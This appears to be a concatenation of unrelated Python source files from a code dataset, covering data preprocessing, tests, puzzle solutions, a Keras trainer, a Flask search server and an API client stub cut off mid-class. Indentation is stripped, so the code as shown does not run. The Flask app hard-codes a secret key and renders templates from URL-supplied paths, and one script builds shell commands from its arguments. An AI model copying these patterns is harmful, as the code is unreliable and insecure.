def parse_args():
parser = argparse.ArgumentParser(
description="[exRNA-pipeline] pre-processing"
)
parser.add_argument("-i", "--input-fq", type=str,
help="Path to the input fastq files.")
parser.add_argument("-o", "--output-fq", type=str,
help="Path to t he output fastq files.")
parser.add_argument("-n", "--sample-name", type=str,
help="Sample name")
parser.add_argument("-a", "--adapter", type=str,
help="Adapter sequence.")
parser.add_argument("-l", "--log-file", type=str,
help="Path to the log file.")
parser.add_argument("-p", "--prefix", type=str,
help="Output prefix")
parser.add_argument("-s", "--scratch-dir", type=str,
help="Path to the scratch diractory.")
args = parser.parse_args()
if args.scratch_dir == "None":
args.scratch_dir = None
return args
def main():
args = parse_args()
if args.scratch_dir:
with SlurmJob(args.scratch_dir) as slurm:
pre_process(
args.input_fq, args.adapter,
f"{slurm.scratch}/{args.sample_name}.htsStats.log",
f"{slurm.scratch}/{args.sample_name}"
)
cmd = f"""
mv {slurm.scratch}/{args.sample_name}_SE.fastq.gz {args.output_fq}
mv {slurm.scratch}/{args.sample_name}.htsStats.log {args.log_file}
"""
logger(cmd)
shell(cmd)
else:
pre_process(args.input_fq, args.adapter,
args.log_file, args. prefix)
if __name__ == "__main__":
main()
|
python
|
import pandas as pd
import csv
original_csv = pd.read_csv('./Fuzzy_dataset.csv')
normal_csv = open('./fuzzy_normal_dataset.csv', 'w', newline='', encoding='utf-8')
normal_csv_file = csv.writer(normal_csv)
abnormal_csv = open('./fuzzy_abnormal_dataset.csv', 'w', newline='', encoding='utf-8')
abnormal_csv_file = csv.writer(abnormal_csv)
idx = 0
normal_first = False
abnormal_first = False
while idx < len(original_csv) // 30:
original_row = original_csv.iloc[idx]
number_of_data = original_row[2]
is_regular = (original_row[number_of_data + 3] == 'R')
original_row.dropna(inplace=True)
if is_regular:
if not normal_first and number_of_data != 8:
idx += 1
continue
normal_first = True
normal_csv_file.writerow(original_row[1:])
else:
if not abnormal_first and number_of_data != 8:
idx += 1
continue
abnormal_first = True
abnormal_csv_file.writerow(original_row[1:])
idx += 1
if idx % 500000 == 0:
print(idx)
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 18 15:34:32 2018
@author: wangyu
"""
import socket
import sys
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) #与服务端相同
try:
sock.connect(('127.0.0.1',1052))
except socket.error as e:
print(e)
sys.exit(-1)
data_send = 'test'
sock.send(data_send.encode())
data_recv = sock.recv(98)
print('recieved len is %d the recv conent is %s'%(len(data_recv),data_recv.decode()))
sock.close()
|
python
|
from .settings import *
from .user_groups import *
|
python
|
import unittest
from unittest.mock import Mock, patch
from nuplan.common.actor_state.scene_object import SceneObject, SceneObjectMetadata
class TestSceneObject(unittest.TestCase):
"""Tests SceneObject class"""
@patch("nuplan.common.actor_state.tracked_objects_types.TrackedObjectType")
@patch("nuplan.common.actor_state.oriented_box.OrientedBox")
def test_initialization(self, mock_box: Mock, mock_tracked_object_type: Mock) -> None:
"""Tests that agents can be initialized correctly"""
scene_object = SceneObject(mock_tracked_object_type, mock_box, SceneObjectMetadata(1, "123", 1, "456"))
self.assertEqual("123", scene_object.token)
self.assertEqual("456", scene_object.track_token)
self.assertEqual(mock_box, scene_object.box)
self.assertEqual(mock_tracked_object_type, scene_object.tracked_object_type)
@patch("nuplan.common.actor_state.scene_object.StateSE2")
@patch("nuplan.common.actor_state.scene_object.OrientedBox")
@patch("nuplan.common.actor_state.scene_object.TrackedObjectType")
@patch("nuplan.common.actor_state.scene_object.SceneObject.__init__")
def test_construction(self, mock_init: Mock, mock_type: Mock, mock_box_object: Mock, mock_state: Mock) -> None:
"""Test that agents can be constructed correctly."""
mock_init.return_value = None
mock_box = Mock()
mock_box_object.return_value = mock_box
_ = SceneObject.from_raw_params("123", "123", 1, 1, mock_state, size=(3, 2, 1))
mock_box_object.assert_called_with(mock_state, width=3, length=2, height=1)
mock_init.assert_called_with(
metadata=SceneObjectMetadata(token="123", track_token="123", timestamp_us=1, track_id=1),
tracked_object_type=mock_type.GENERIC_OBJECT,
oriented_box=mock_box,
)
if __name__ == '__main__':
unittest.main()
|
python
|
# @Title: 数组中重复的数字 (数组中重复的数字 LCOF)
# @Author: 18015528893
# @Date: 2021-02-28 16:44:53
# @Runtime: 52 ms
# @Memory: 23.4 MB
class Solution:
def findRepeatNumber(self, nums: List[int]) -> int:
for i in range(len(nums)):
while nums[i] != i:
if nums[nums[i]] == nums[i]:
return nums[i]
else:
nums[nums[i]], nums[i] = nums[i], nums[nums[i]]
return -1
|
python
|
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied.
# See the License for the specific language governing permissions and limitations under the License.
import logging
import boto3
from assertpy import assert_that
from utils import get_root_volume_id
def convert_tags_dicts_to_tags_list(tags_dicts):
"""Convert dicts of the form {key: value} to a list like [{"Key": key, "Value": value}]."""
tags_list = []
for tags_dict in tags_dicts:
tags_list.extend([{"Key": key, "Value": value} for key, value in tags_dict.items()])
return tags_list
def get_cloudformation_tags(region, stack_name):
"""
Return the tags for the CFN stack with the given name
The returned values is a list like the following:
[
{'Key': 'Key2', 'Value': 'Value2'},
{'Key': 'Key1', 'Value': 'Value1'},
]
"""
cfn_client = boto3.client("cloudformation", region_name=region)
response = cfn_client.describe_stacks(StackName=stack_name)
return response["Stacks"][0]["Tags"]
def get_main_stack_tags(cluster):
"""Return the tags for the cluster's main CFN stack."""
return get_cloudformation_tags(cluster.region, cluster.cfn_name)
def get_ec2_instance_tags(instance_id, region):
"""Return a list of tags associated with the given EC2 instance."""
logging.info("Getting tags for instance %s", instance_id)
return (
boto3.client("ec2", region_name=region)
.describe_instances(InstanceIds=[instance_id])
.get("Reservations")[0]
.get("Instances")[0]
.get("Tags")
)
def get_tags_for_volume(volume_id, region):
"""Return the tags attached to the given EBS volume."""
logging.info("Getting tags for volume %s", volume_id)
return boto3.client("ec2", region_name=region).describe_volumes(VolumeIds=[volume_id]).get("Volumes")[0].get("Tags")
def get_head_node_root_volume_tags(cluster, os):
"""Return the given cluster's head node's root volume's tags."""
root_volume_id = get_root_volume_id(cluster.head_node_instance_id, cluster.region, os)
return get_tags_for_volume(root_volume_id, cluster.region)
def get_head_node_tags(cluster):
"""Return the given cluster's head node's tags."""
return get_ec2_instance_tags(cluster.head_node_instance_id, cluster.region)
def get_compute_node_root_volume_tags(cluster, os):
"""Return the given cluster's compute node's root volume's tags."""
compute_nodes = cluster.get_cluster_instance_ids(node_type="Compute")
assert_that(compute_nodes).is_length(1)
root_volume_id = get_root_volume_id(compute_nodes[0], cluster.region, os)
return get_tags_for_volume(root_volume_id, cluster.region)
def get_compute_node_tags(cluster):
"""Return the given cluster's compute node's tags."""
compute_nodes = cluster.get_cluster_instance_ids(node_type="Compute")
assert_that(compute_nodes).is_length(1)
return get_ec2_instance_tags(compute_nodes[0], cluster.region)
def get_ebs_volume_tags(volume_id, region):
"""Return the tags associated with the given EBS volume."""
return boto3.client("ec2", region_name=region).describe_volumes(VolumeIds=[volume_id]).get("Volumes")[0].get("Tags")
def get_shared_volume_tags(cluster):
"""Return the given cluster's EBS volume's tags."""
shared_volume = cluster.cfn_resources.get("EBS0")
return get_ebs_volume_tags(shared_volume, cluster.region)
|
python
|
"""
Helper module allowing src modules to be imported into tests
"""
# pylint: disable=wrong-import-position
# pylint: disable=unused-import
import os
import sys
from blockutils.common import ensure_data_directories_exist
from blockutils.stac import STACQuery
# NOTE: this must be before the modis and gibs imports - else tests will not find path
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "../src")))
from src.gibs import (
GibsAPI,
extract_query_dates,
make_list_layer_band,
move_dates_to_past,
)
from src.modis import Modis
|
python
|
from .context import get_puzzle, get_solution_script
index = 7
INPUT = """
16,1,2,0,4,2,7,1,2,14
"""[1:-1].split("\n")
def test_d7p1():
script = get_solution_script(index)
assert script is not None, "script is none"
d7p1 = script("d7p1")
assert d7p1 is not None, "d7p1 is none"
result = d7p1(INPUT)
assert result == 37, f"result is not 37: {result}"
def test_d7p2():
script = get_solution_script(index)
assert script is not None, "script is none"
d7p2 = script("d7p2")
assert d7p2 is not None, "d7p2 is none"
result = d7p2(INPUT)
assert result == 168, f"result is not 168: {result}"
|
python
|
from collections import deque
def getIsWall(data):
favoriteNumber = int(data)
def isWall(x, y):
if y < 0 or x < 0:
return True
n = favoriteNumber + x * x + 3 * x + 2 * x * y + y + y * y
wall = 0
while n:
wall ^= n & 1
n >>= 1
return bool(wall)
return isWall
def search(isWall, goal):
seen = set()
queue = deque([((1, 1), 0)])
while queue:
curr, steps = queue.popleft()
if curr in seen:
continue
seen.add(curr)
if curr == goal:
return steps
y, x = curr
for nxt in ((y - 1, x), (y + 1, x), (y, x - 1), (y, x + 1)):
if not isWall(*nxt):
queue.append((nxt, steps + 1))
def searchMaxSteps(isWall, maxSteps):
seen = set()
queue = deque([((1, 1), 0)])
while queue:
curr, steps = queue.popleft()
if curr in seen or steps > maxSteps:
continue
seen.add(curr)
y, x = curr
for nxt in ((y - 1, x), (y + 1, x), (y, x - 1), (y, x + 1)):
if not isWall(*nxt):
queue.append((nxt, steps + 1))
return len(seen)
def part1(data):
return search(getIsWall(data), (31, 39))
def part2(data):
return searchMaxSteps(getIsWall(data), 50)
if __name__ == "__main__":
from aocd import get_data
data = get_data(year=2016, day=13)
print(part1(data))
print(part2(data))
|
python
|
# coding: utf-8
import cv2, os, sys
from PIL import Image
import numpy as np
import os
from tensorflow import keras
from tensorflow.keras.layers import Input
from .Models import GoogLeNetModel
from .Models import VGG16Model
from .Models import InceptionV3Model
from .Models import MobileNetModel
from .Models import ResNet50Model
from . import const
from . import DA
from . import DA_setting
from main.log import get_logger
logger = get_logger(__name__)
class BaseNetwork(object):
def __init__(self, **params):
self.channel = params['channel'] if 'channel' in params else 3
self.classes = params['classes'] if 'classes' in params else 1
self.network = params['network']
self.input_size = params['input_size'] if 'input_size' in params else None
self.mean_image = params['mean_image'] if 'mean_image' in params else None
self.image_type = params['image_type'] if 'image_type' in params else None
self.xn = None
self.yn = None
self.val_xn = None
self.val_yn = None
self.pred_xn = None
self.pred_yn = None
def generate_train_data(self, train_list, da, batch_size):
# count = 0
while True:
for data in train_list:
# count += 1
# get image(np.ndarray)
image = self._get_image_array(data[0],
resize=self.input_size,
dtype=np.uint8,
normalization=False)
# for galleria
y = data[1]
# Data augmentation
if len(data) < 3:
da_info = [[DA.NON_DA], [DA.NON_DA]]
else:
da_info = data[2]
da_im = da.get_image(image, da_info[0], da_info[1])
# test code
#savedir = ""
#savename = "test_{}.jpg".format(count)
#savepath = os.path.join(savedir,savename)
#save_arr = Image.fromarray(np.uint8(da_im))
#save_arr.save(savepath)
da_im = da_im[np.newaxis,:,:,:]
da_im = da_im.astype(np.float32)
da_im /= 255
if self.xn is None:
self.xn = da_im
self.yn = y
else:
self.xn = np.vstack((self.xn, da_im))
self.yn = np.vstack((self.yn, y))
if len(self.xn) == batch_size:
input_xn = self.xn
input_yn = self.yn
self.xn = None
self.yn = None
if self.network == const.GOOGLE_NET:
yield(input_xn,
{'loss1': input_yn,
'loss2': input_yn,
'loss3': input_yn})
else:
yield(input_xn, input_yn)
def generate_val_data(self, val_list, da, batch_size):
# count = 0
while True:
for data in val_list:
# count += 1
# get image(np.ndarray)
image = self._get_image_array(data[0],
resize=self.input_size,
dtype=np.uint8,
normalization=False)
# for galleria
y = data[1]
# Data augmentation
if len(data) < 3:
da_info = [[DA.NON_DA], [DA.NON_DA]]
else:
da_info = data[2]
da_im = da.get_image(image, da_info[0], da_info[1])
# test code
#savedir = ""
#savename = "val_{}.jpg".format(count)
#savepath = os.path.join(savedir,savename)
#save_arr = Image.fromarray(np.uint8(da_im))
#save_arr.save(savepath)
da_im = da_im[np.newaxis,:,:,:]
da_im = da_im.astype(np.float32)
da_im /= 255
if self.val_xn is None:
self.val_xn = da_im
self.val_yn = y
else:
self.val_xn = np.vstack((self.val_xn, da_im))
self.val_yn = np.vstack((self.val_yn, y))
if len(self.val_xn) == batch_size:
input_xn = self.val_xn
input_yn = self.val_yn
self.val_xn = None
self.val_yn = None
if self.network == const.GOOGLE_NET:
yield(input_xn,
{'loss1': input_yn,
'loss2': input_yn,
'loss3': input_yn})
else:
yield(input_xn, input_yn)
def generate_predict_data(self, test_list, batch_size):
while True:
for data in test_list:
image = self._get_image_array(data[0], #train_path,
resize=self.input_size,
dtype=np.uint8,
normalization=False)
image = image[np.newaxis,:,:,:]
image = image.astype(np.float32)
image /= 255
if self.pred_xn is None:
self.pred_xn = image
else:
self.pred_xn = np.vstack((self.pred_xn, image))
if len(self.pred_xn) == batch_size:
input_xn = self.pred_xn
self.pred_xn = None
yield(input_xn)
def _get_image_array(self, path, **params):
dtype = params['dtype'] if 'dtype' in params else np.float32
resize = params['resize'] if 'resize' in params else None
normalization = params['normalization'] if 'normalization' in params else False
if self.channel == 1:
#img = Image.open(path).convert('L')
img = Image.open(path).convert('RGB')
elif self.channel == 3:
img = Image.open(path).convert('RGB')
else:
img = Image.open(path).convert('RGB')
im_arr = np.asarray(img)
if resize is not None:
im_arr = cv2.resize(im_arr, tuple(resize), interpolation=cv2.INTER_CUBIC)
# 8bit image convert [w,h,1]
# 32 bit image keep [w,h,3]
if im_arr.ndim == 2:
im_arr = im_arr[:,:,np.newaxis]
# maybe RGBA type image protection
if im_arr.ndim == 4:
im_arr = im_arr[:,:,:3]
im_arr = im_arr.astype(dtype)
# use mean image
if self.mean_image is not None:
mean = Image.open(self.mean_image).convert('RGB')
mean_arr = np.asarray(mean)
im_arr -= mean_arr
if normalization == True:
im_arr /= 255
return im_arr
'''
def _resize_array(self, image):
if image.shape[0] != self.input_size[0] or image.shape[1] != self.input_size[1]:
if image.dtype == np.float32 or image.dtype == np.float64:
if K.image_dim_ordering() == 'th':
image = image[0,:,:]
else:
image = image[:,:,0]
im = Image.fromarray(image)
im = im.resize(self.input_size, resample=Image.BICUBIC)
image = np.asarray(im)
if K.image_dim_ordering() == 'th':
image = image[np.newaxis,:,:]
else:
image = image[:,:,np.newaxis]
return image
'''
class Network(BaseNetwork):
def __init__(self, **params):
super(Network,self).__init__(**params)
input_tensor = Input(shape=(self.input_size[0], self.input_size[1], self.channel))
# input_tensor = Input(shape=(self.input_size[0], self.input_size[1], 3))
self.model = None
logger.debug(self.network)
if self.network == const.GOOGLE_NET:
# self.model = InceptionV3Model(self.classes,input_tensor).model
# self.model = GoogLeNetModel(self.classes, None, self.channel, self.input_size).model
self.model = GoogLeNetModel(self.classes, None, 3, self.input_size).model
elif self.network == const.VGG16:
self.model = VGG16Model(self.classes,input_tensor).model
elif self.network == const.MOBILE_NET:
self.model = MobileNetModel(self.classes,input_tensor).model
elif self.network == const.RESNET50:
self.model = ResNet50Model(self.classes,input_tensor).model
# self.model.summary()
def train(self, train_data, val_data, **params):
epochs = params['epochs'] if 'epochs' in params else 1
callbacks = params['callbacks'] if 'callbacks' in params else None
batch = params['batch'] if 'batch' in params else 1
val_batch = params['val_batch'] if 'val_batch' in params else 1
da_params = params['data_augmentation'] if 'data_augmentation' in params else None
da= DA_setting.run(da_params)
da_instance = DA.DataAugmentation(da)
train_data = da_instance.create_data_list(train_data)
val_data = da_instance.create_data_list(val_data)
train_data_batch_num = len(train_data) // batch
if train_data_batch_num < 1:
logger.debug('train_data_batch_num < 1')
sys.exit(1)
if val_data is not None:
val_data_batch_num = len(val_data) // val_batch
logger.debug(val_data_batch_num)
if val_data_batch_num < 1:
logger.debug('val_data_batch_num < 1')
sys.exit(1)
self.model.fit(
self.generate_train_data(train_data, da_instance, batch),
steps_per_epoch=train_data_batch_num,
epochs=epochs,
validation_data=self.generate_val_data(val_data, da_instance, val_batch),
validation_steps=val_data_batch_num,
callbacks=callbacks,
verbose=1)
else:
self.model.fit(
self.generate_train_data(train_data, da_instance, batch),
steps_per_epoch=train_data_batch_num,
epochs=epochs,
callbacks=callbacks,
verbose=1)
def save(self, path):
self.model.save(path)
def predict(self, data_list, **params):
batch = params['batch'] if 'batch' in params else 1
return self.model.predict_generator(
self.generate_predict_data(data_list, batch),#, da_instance),
steps=len(data_list) // batch,
verbose=1)
|
python
|
#!/usr/bin/env python
from argparse import ArgumentParser
import sys
parser = ArgumentParser(description="Run the test suite.")
parser.add_argument(
"--failfast",
action="store_true",
default=False,
dest="failfast",
help="Stop the test suite after the first failed test.",
)
parser.add_argument(
"--no-coverage",
action="store_false",
default=True,
dest="coverage",
help="Do not run coverage.py while running the tests.",
)
parser.add_argument(
"--no-input",
action="store_false",
default=True,
dest="interactive",
help="If the tests require input, do not prompt the user for input.",
)
args = parser.parse_args()
if args.coverage:
try:
from coverage import coverage
cov = coverage(include="doac*")
cov.start()
except ImportError:
cov = None
else:
cov = None
from django.conf import settings
from tests import settings as test_settings
settings.configure(test_settings, debug=True)
from django.test.utils import get_runner
TestRunner = get_runner(settings)
runner = TestRunner(verbosity=1, interactive=args.interactive, failfast=args.failfast)
failures = runner.run_tests(["tests", ])
if cov:
cov.stop()
cov.html_report()
if failures:
sys.exit(bool(failures))
|
python
|
import torch
def accuracy(pred, target):
pred = pred.float()
correct = 0
for i in range(target.size()[0]):
if (pred[i] == pred[i].max()).nonzero() == target[i]:
correct += 1
return correct / target.size()[0]
|
python
|
# Function to sort an unsorted list (due to globbing) using a number
# occuring in the path.
# Author: Lukas Snoek [lukassnoek.github.io]
# Contact: [email protected]
# License: 3 clause BSD
from __future__ import division, print_function, absolute_import
import os.path as op
def sort_numbered_list(stat_list):
""" Sorts a list containing numbers.
Sorts list with paths to statistic files (e.g. COPEs, VARCOPES),
which are often sorted wrong (due to single and double digits).
This function extracts the numbers from the stat files and sorts
the original list accordingly.
Parameters
----------
stat_list : list or str
list with absolute paths to files
Returns
-------
sorted_list : list of str
sorted stat_list
"""
num_list = []
for path in stat_list:
num = [str(s) for s in str(op.basename(path)) if s.isdigit()]
num_list.append(int(''.join(num)))
sorted_list = [x for y, x in sorted(zip(num_list, stat_list))]
return sorted_list
|
python
|
##############################
# support query serve for front web system
# filename:query.py
# author: liwei
# StuID: 1711350
# date: 2019.12.1
##############################
#查询构建
from whoosh import highlight
from whoosh import qparser
from whoosh import index
from flask import Flask
from flask import request
from flask import jsonify,render_template,abort, redirect, url_for,session, escape,Markup
from flask_cors import *
import re
import logging
from numpy import std
from data import xy_dict
from data import get_html,get_teacher_info,pagerank
# from audio import *
app = Flask(__name__)
CORS(app,supports_credentials=True) # 解决跨域请求无响应问题
app.secret_key=b'\xfa\n\x08\xb9\x84I\xe5xRdE\xea\x9f\xba\xce\x81'
mysession =dict() # 自定义的session用来传输数据
url_dict,scores = pagerank(get_teacher_info()) # 获取pageranke计算结果,返回链接映射和排名得分
# 定义日志记录文件的配置
LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
DATE_FORMAT = "%m/%d/%Y %H:%M:%S %p"
logging.basicConfig(filename='my.log', level=logging.DEBUG, format=LOG_FORMAT, datefmt=DATE_FORMAT)
ix = index.open_dir("index") #打开该目录一遍存储索引文件
# 网页快照路由
@app.route('/snapshots/<xueyuan>/<filename>',methods=["GET"])
def snapshots(xueyuan = None ,filename=None):
if filename!=None and xueyuan !=None:
return render_template('snapshots/'+xueyuan+'/'+filename)
# 主页路由
@app.route('/',methods=["GET"])
def index():
return render_template("index.html",query="")
# 结果展示页面路由
@app.route('/display/',methods=["GET","POST"])
def display_index():
return render_template("display.html",count="#",query="输入查询词")
# 结果展示get请求页面响应
@app.route('/display/<count>&<query>')
def display(count=None,query=None):
#print(query)
if 'data' in mysession.keys():
#print(mysession["data"])
return render_template("display.html",count=count,query=query,res=mysession['data'])
else:
return redirect('/display/')
# # 实现语音输入查询
# @app.route('/audio',methods=['GET','POST'])
# def audio_query():
# assert request.path == '/audio'
# # 通过语音识别API获取查询输入
# get_audio(in_path)
# # 测试代码
# filename = "./speechs/input.wav"
# signal = open(filename, "rb").read()
# rate = 16000
# token = get_token()
# msg = recognize(signal, rate, token)
# query_sentence = " "
# if "err_no" in dict(msg).keys():
# logging.warning("%d,没有获取有效语音输入!错误消息%s 错误代码%d" %( 404,msg["err_msg"],msg["err_no"]))
# return "%d,没有获取有效语音输入!错误消息%s 错误代码%d" %( 404,msg["err_msg"],msg["err_no"]), 404
# else:
# query_sentence = msg['result']
# # 记录日志
# logging.info("Audio Query sentence: %s" % query_sentence)
# res = []
# with ix.searcher() as searcher:
# # 对输入的查询文本进行解析,如果存在按域查询的需求则区分按域查询,默认采用多属性查询模式
# # mark 表示是否需要高亮学院查询区域,默认情况下需要
# highlight_xy = True
# # 默认的多域查询
# query = qparser.MultifieldParser(["content", "title", "mtext", "xueyuan"], ix.schema)
# if query_sentence.endswith("$姓名$"):
# # 按名字查询
# query = qparser.SimpleParser("title", ix.schema)
# query_sentence = query_sentence.strip('$姓名$')
# elif query_sentence.endswith("$学院$"):
# # 按学院查询
# query = qparser.SimpleParser("xueyuan", ix.schema)
# query_sentence = query_sentence.strip('$学院$')
#
# elif query_sentence.endswith("$网页$"):
# # 按网页内容查询
# query = qparser.SimpleParser("content", ix.schema)
# query_sentence = query_sentence.strip('$网页$')
#
# # print(query_sentence)
# # 引入查询解析器插件
# query.add_plugin(qparser.WildcardPlugin)
#
# # query.remove_plugin_class(qparser.WildcardPlugin)
# query.add_plugin(qparser.PrefixPlugin())
# query.add_plugin(qparser.OperatorsPlugin)
# query.add_plugin(qparser.RegexPlugin)
# query.add_plugin(qparser.PhrasePlugin)
#
# # 解析得到查询器
# q = query.parse(query_sentence)
# logging.info("Query parse result: %s" % str(q))
# print(q)
# # 获取查询结果
# result = searcher.search(q, limit=20)
# # print(result)
# # 设置碎片的属性
# # Allow larger fragments
# my_cf = highlight.ContextFragmenter(maxchars=200, surround=30)
# hf = highlight.HtmlFormatter(tagname='em', classname='match', termclass='term')
#
# hi = highlight.Highlighter(fragmenter=my_cf, formatter=hf)
# for hit in result:
# print(hit["picpath"])
# print(hit["title"])
# print(escape(hi.highlight_hit(hit, "content")))
# if hit['picpath'] == '#':
# if highlight_xy:
# res.append({"title": hit['title'],
# "xueyuan": Markup(hi.highlight_hit(hit, "xueyuan")),
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": '#',
# "pagerank": scores[url_dict[hit["url"]]]
# })
# else:
# res.append({"title": hit['title'],
# "xueyuan": hit["xueyuan"],
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": '#',
# "pagerank": scores[url_dict[hit["url"]]]
# })
# else:
# if highlight_xy:
# res.append({"title": hit['title'],
# "xueyuan": Markup(hi.highlight_hit(hit, "xueyuan")),
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": "images/%s/%s" % (
# hit['picpath'].split('/')[-3], hit['picpath'].split('/')[-1]),
# "pagerank": scores[url_dict[hit["url"]]]
# })
# else:
# res.append({"title": hit['title'],
# "xueyuan": hit["xueyuan"],
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": "images/%s/%s" % (
# hit['picpath'].split('/')[-3], hit['picpath'].split('/')[-1]),
# "pagerank": scores[url_dict[hit["url"]]]
# })
# print(len(result))
# print(res)
# count = len(result)
#
# if count == 0:
# logging.warning("%d,没有查询到相关内容!" % 404)
# return "没有查询到相关内容!", 404
# else:
# # 记录查询日志
# log = "Response: "
# for item in res:
# log = log + " (name:%s,url:%s) " % (item["title"], item["url"])
# logging.info(log)
#
# # # 基于page rank 对链接进行排序
# # res.sort(key=lambda k:(k.get("pagerank",0)),reverse = True)
# # print(res)
#
# mysession["data"] = res # 使用会话session传递参数
# return jsonify({"url": "/display/%d&%s" % (count, query_sentence)})
# 基本查询函数,实现前缀、通配、正则匹配,短语、关系运算查询功能
# 基于whoosh的highlighter实现返回高亮查询词块
@app.route('/index',methods=['GET','POST'])
def base_query():
assert request.path == '/index'
#print(dict(request.form)["query"][0])
#print(dict(request.form))
query_sentence = str(dict(request.form)["query"][0])
logging.info("Query sentence: %s"%query_sentence)
res = []
with ix.searcher() as searcher:
# 对输入的查询文本进行解析,如果存在按域查询的需求则区分按域查询,默认采用多属性查询模式
# mark 表示是否需要高亮学院查询区域,默认情况下需要
highlight_xy = True
# 默认的多域查询
query = qparser.MultifieldParser(["content","title","mtext","xueyuan"], ix.schema)
if query_sentence.endswith("$姓名$"):
# 按名字查询
query =qparser.SimpleParser("title",ix.schema)
query_sentence=query_sentence.strip('$姓名$')
elif query_sentence.endswith("$学院$"):
# 按学院查询
query = qparser.SimpleParser("xueyuan", ix.schema)
query_sentence=query_sentence.strip('$学院$')
elif query_sentence.endswith("$网页$"):
# 按网页内容查询
query = qparser.SimpleParser("content", ix.schema)
query_sentence=query_sentence.strip('$网页$')
#print(query_sentence)
# 引入查询解析器插件
query.add_plugin(qparser.WildcardPlugin)
# query.remove_plugin_class(qparser.WildcardPlugin)
query.add_plugin(qparser.PrefixPlugin())
query.add_plugin(qparser.OperatorsPlugin)
query.add_plugin(qparser.RegexPlugin)
query.add_plugin(qparser.PhrasePlugin)
# 解析得到查询器
q = query.parse(query_sentence)
logging.info("Query parse result: %s"%str(q))
print(q)
# 获取查询结果
result = searcher.search(q,limit=20)
# print(result)
# 设置碎片的属性
# Allow larger fragments
my_cf = highlight.ContextFragmenter(maxchars=200, surround=30)
hf = highlight.HtmlFormatter( tagname='em', classname='match', termclass='term')
hi = highlight.Highlighter(fragmenter=my_cf,formatter=hf)
for hit in result:
print(hit["picpath"])
print(hit["title"])
print(escape(hi.highlight_hit(hit,"content")))
if hit['picpath'] =='#':
if highlight_xy:
res.append({"title": hit['title'],
"xueyuan": Markup(hi.highlight_hit(hit, "xueyuan")),
"url": hit["url"],
'shotpath': hit['shotpath'],
"content": Markup(hi.highlight_hit(hit, "content")),
"parenturl": hit["parenturl"],
"picpath": '#',
"pagerank":scores[url_dict[hit["url"]]]
})
else:
res.append({"title": hit['title'],
"xueyuan": hit["xueyuan"],
"url": hit["url"],
'shotpath': hit['shotpath'],
"content": Markup(hi.highlight_hit(hit, "content")),
"parenturl": hit["parenturl"],
"picpath": '#',
"pagerank":scores[url_dict[hit["url"]]]
})
else:
if highlight_xy:
res.append({"title":hit['title'],
"xueyuan":Markup(hi.highlight_hit(hit, "xueyuan")),
"url":hit["url"],
'shotpath':hit['shotpath'],
"content":Markup(hi.highlight_hit(hit,"content")),
"parenturl": hit["parenturl"],
"picpath":"images/%s/%s"%(hit['picpath'].split('/')[-3],hit['picpath'].split('/')[-1]),
"pagerank": scores[url_dict[hit["url"]]]
})
else:
res.append({"title": hit['title'],
"xueyuan": hit["xueyuan"],
"url": hit["url"],
'shotpath': hit['shotpath'],
"content": Markup(hi.highlight_hit(hit, "content")),
"parenturl": hit["parenturl"],
"picpath": "images/%s/%s" % (
hit['picpath'].split('/')[-3], hit['picpath'].split('/')[-1]),
"pagerank": scores[url_dict[hit["url"]]]
})
print(len(result))
print(res)
count = len(result)
if count ==0:
logging.warning("%d,没有查询到相关内容!"%404)
return "没有查询到相关内容!",404
else:
# 记录查询日志
log = "Response: "
for item in res:
log = log + " (name:%s,url:%s) " % (item["title"], item["url"])
logging.info(log)
# # 基于page rank 对链接进行排序
# res.sort(key=lambda k:(k.get("pagerank",0)),reverse = True)
# print(res)
mysession["data"] = res # 使用会话session传递参数
return jsonify({"url":"/display/%d&%s"%(count,query_sentence)})
if __name__ == '__main__':
app.run(debug=False,use_reloader=False)
|
python
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generated client library for servicecontrol version v1."""
# NOTE: This file is originally auto-generated using google-apitools then
# style-correcting hand edits were applied. New behaviour should not provided
# by hand, please re-generate and restyle.
from __future__ import absolute_import
from apitools.base.py import base_api
from . import servicecontrol_v1_messages as messages
class ServicecontrolV1(base_api.BaseApiClient):
"""Generated client library for service servicecontrol version v1."""
MESSAGES_MODULE = messages
_PACKAGE = u'servicecontrol'
_SCOPES = [u'https://www.googleapis.com/auth/cloud-platform',
u'https://www.googleapis.com/auth/servicecontrol']
_VERSION = u'v1'
_CLIENT_CLASS_NAME = u'ServicecontrolV1'
_URL_VERSION = u'v1'
_API_KEY = None
# pylint: disable=too-many-arguments
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None):
"""Create a new servicecontrol handle."""
url = url or u'https://servicecontrol.googleapis.com/'
super(ServicecontrolV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers)
self.services = self.ServicesService(self)
class ServicesService(base_api.BaseApiService):
